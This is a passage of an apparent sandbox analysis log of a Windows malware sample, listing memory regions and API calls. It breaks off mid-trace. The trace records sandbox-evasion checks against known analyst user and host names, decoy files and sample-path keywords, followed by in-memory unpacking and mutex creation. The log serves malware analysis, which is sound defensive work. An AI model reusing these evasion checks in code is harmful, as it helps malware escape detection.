"\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1395 start_va = 0x300000 end_va = 0x300fff entry_point = 0x300000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1396 start_va = 0x310000 end_va = 0x311fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1397 start_va = 0x1b90000 end_va = 0x1c8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b90000" filename = "" Region: id = 1398 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1399 start_va = 0x300000 end_va = 0x300fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 1400 start_va = 0x320000 end_va = 0x37bfff entry_point = 0x3435b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1401 start_va = 0x320000 end_va = 0x37bfff entry_point = 0x3435b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1402 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1403 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1404 start_va = 0x990000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1405 start_va = 0x990000 end_va = 0xa6efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000990000" filename = "" Region: id = 1406 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 1407 start_va = 0x1d90000 end_va = 0x1e8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d90000" filename = "" Region: id = 1408 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1409 start_va = 0x320000 end_va = 0x343fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1410 start_va = 0x735e0000 end_va = 0x736dafff entry_point = 0x735f17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1411 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1412 start_va = 0x360000 end_va = 0x368fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1413 start_va = 0x370000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1414 start_va = 0xa70000 end_va = 0xa78fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1415 start_va = 0xb00000 end_va = 0xbfffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 1416 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71512c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1417 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1418 start_va = 0x1b30000 end_va = 0x1b77fff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 1419 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1420 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1421 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1422 start_va = 0x320000 end_va = 0x331fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1423 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1424 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1425 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1426 start_va = 0x1c90000 end_va = 0x1cd7fff entry_point = 0x0 region_type = private name = "private_0x0000000001c90000" filename = "" Region: id = 1427 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1428 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1429 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1430 start_va = 0x360000 end_va = 0x371fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1431 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1432 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1433 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1434 start_va = 0x380000 end_va = 0x391fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1435 start_va = 0x340000 end_va = 0x34cfff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1436 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1437 start_va = 0xa70000 end_va = 0xa7cfff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1438 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1439 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1440 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1441 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1442 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1443 start_va = 0x74af0000 end_va = 0x74b06fff entry_point = 0x74af1c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1444 start_va = 0x753f0000 end_va = 0x753fafff entry_point = 0x753f1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1445 start_va = 0x74180000 end_va = 0x7418cfff entry_point = 0x741811e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1446 start_va = 0x1f90000 end_va = 0x208ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 1447 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1448 start_va = 0xa80000 end_va = 0xa96fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1449 start_va = 0x74600000 end_va = 0x746f4fff entry_point = 0x74610d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1450 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1451 start_va = 0x766f0000 end_va = 0x76772fff entry_point = 0x766f23d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1452 start_va = 0xa90000 end_va = 0xa90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 1453 start_va = 0xaa0000 end_va = 0xaa3fff entry_point = 0xaa0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1454 start_va = 0xc00000 end_va = 0xc2ffff entry_point = 0xc00000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db") Region: id = 1455 start_va = 0xc30000 end_va = 0xc33fff entry_point = 0xc30000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1456 start_va = 0x1ce0000 end_va = 0x1d45fff entry_point = 0x1ce0000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 1457 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1458 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1459 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1460 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1461 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1462 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1463 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1464 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1465 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1466 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1467 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1468 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1469 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1470 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1471 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1472 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1473 start_va = 0x74800000 end_va = 0x74820fff entry_point = 0x7480145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1474 start_va = 0x77420000 end_va = 0x77464fff entry_point = 0x774211e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1475 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1476 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1477 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1478 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1479 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1480 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1481 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1482 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1483 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1484 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1485 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1486 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1487 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1488 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1489 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1490 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1491 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1492 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1493 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1494 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1495 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1496 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1497 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1498 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1499 start_va = 0x1b80000 end_va = 0x1b80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b80000" filename = "" Region: id = 1500 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 1501 start_va = 0x74e70000 end_va = 0x74e85fff entry_point = 0x74e72dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Thread: id = 67 os_tid = 0xbf0 [0070.350] GetConsoleCP () returned 0x0 [0070.351] GetMUILanguage () returned 0x0 [0070.351] ConvertFiberToThread () returned 0 [0070.351] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0070.352] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseCapture") returned 0x768c69f2 [0070.352] ReleaseCapture () returned 1 [0070.352] GetProcAddress (hModule=0x76890000, lpProcName="GetProcessWindowStation") returned 0x7689dfdc [0070.353] GetProcessWindowStation () returned 0x30 [0070.353] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x2ef8a8, cbFileInfo=0x160, uFlags=0x4200 | out: psfi=0x2ef8a8) returned 0x67dd0 [0070.451] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0070.451] GetCaretBlinkTime () returned 0x212 [0070.451] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef59c | out: ProcedureAddress=0x2ef59c*=0x765e2fb6) returned 0x0 [0070.451] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x380000 [0070.455] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef5bc | out: ProcedureAddress=0x2ef5bc*=0x765e2fb6) returned 0x0 [0070.455] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x340000 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x765e395c) returned 0x0 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x765e33d3) returned 0x0 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x765e2fb6) returned 0x0 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x765d2341) returned 0x0 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x765ddb13) returned 0x0 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x772af774) returned 0x0 [0070.456] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2ef69c | out: ProcedureAddress=0x2ef69c*=0x7731ad2e) returned 0x0 [0070.456] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0070.457] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0070.457] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0070.457] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0070.457] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0070.457] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0070.457] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0070.458] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0070.458] GetUserNameA (in: lpBuffer=0x2ef5cc, pcbBuffer=0x2ef3c8 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x2ef3c8) returned 1 [0070.462] GetComputerNameA (in: lpBuffer=0x2ef4cc, nSize=0x2ef3c8 | out: lpBuffer="F71GWAT", nSize=0x2ef3c8) returned 1 [0070.462] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x2ef3cc, nSize=0x2ef3c8 | out: lpBuffer="F71gwat", nSize=0x2ef3c8) returned 1 [0070.462] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0070.462] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0070.462] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0070.462] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0070.463] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0070.463] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0070.463] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.463] CloseHandle (hObject=0xffffffff) returned 0 [0070.463] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0070.463] CloseHandle (hObject=0xffffffff) returned 0 [0070.463] GetModuleHandleA (lpModuleName=0x0) returned 0xc40000 [0070.463] GetModuleFileNameA (in: hModule=0xc40000, lpFilename=0x2ef5dc, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe")) returned 0x4d [0070.463] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpSrch="sample") returned 0x0 [0070.463] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpSrch="mlwr_smpl") returned 0x0 [0070.463] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpSrch="artifact.exe") returned 0x0 [0070.463] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0xa70000 [0070.465] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0070.465] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0070.465] FreeConsole () returned 0 [0070.465] VirtualProtect (in: lpAddress=0xa71000, dwSize=0x88aa, flNewProtect=0x20, lpflOldProtect=0x2ef6c4 | out: lpflOldProtect=0x2ef6c4*=0x4) returned 1 [0070.465] VirtualProtect (in: lpAddress=0xa7a000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x2ef6c4 | out: lpflOldProtect=0x2ef6c4*=0x4) returned 1 [0070.465] VirtualProtect (in: lpAddress=0xa7b000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x2ef6c4 | out: lpflOldProtect=0x2ef6c4*=0x4) returned 1 [0070.465] VirtualProtect (in: lpAddress=0xa7c000, dwSize=0x4dc, flNewProtect=0x2, lpflOldProtect=0x2ef6c4 | out: lpflOldProtect=0x2ef6c4*=0x4) returned 1 [0070.465] VirtualProtect (in: lpAddress=0xa70000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x2ef6c4 | out: lpflOldProtect=0x2ef6c4*=0x4) returned 1 [0072.212] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ef7e8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe")) returned 0x4d [0072.212] _snwprintf (in: _Dest=0x2ef9f0, _Count=0x40, _Format="E%X" | out: _Dest="EB66D4A35") returned 9 [0072.212] _snwprintf (in: _Dest=0x2efa70, _Count=0x40, _Format="M%X" | out: _Dest="MB66D4A35") returned 9 [0072.212] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EB66D4A35") returned 0x114 [0072.212] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MB66D4A35") returned 0x118 [0072.212] GetLastError () returned 0xb7 [0072.212] SetEvent (hEvent=0x114) returned 1 [0072.216] CloseHandle (hObject=0x114) returned 1 [0072.217] CloseHandle (hObject=0x118) returned 1 [0072.217] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0072.217] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x77140000 [0072.217] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0072.217] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0072.221] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0072.225] 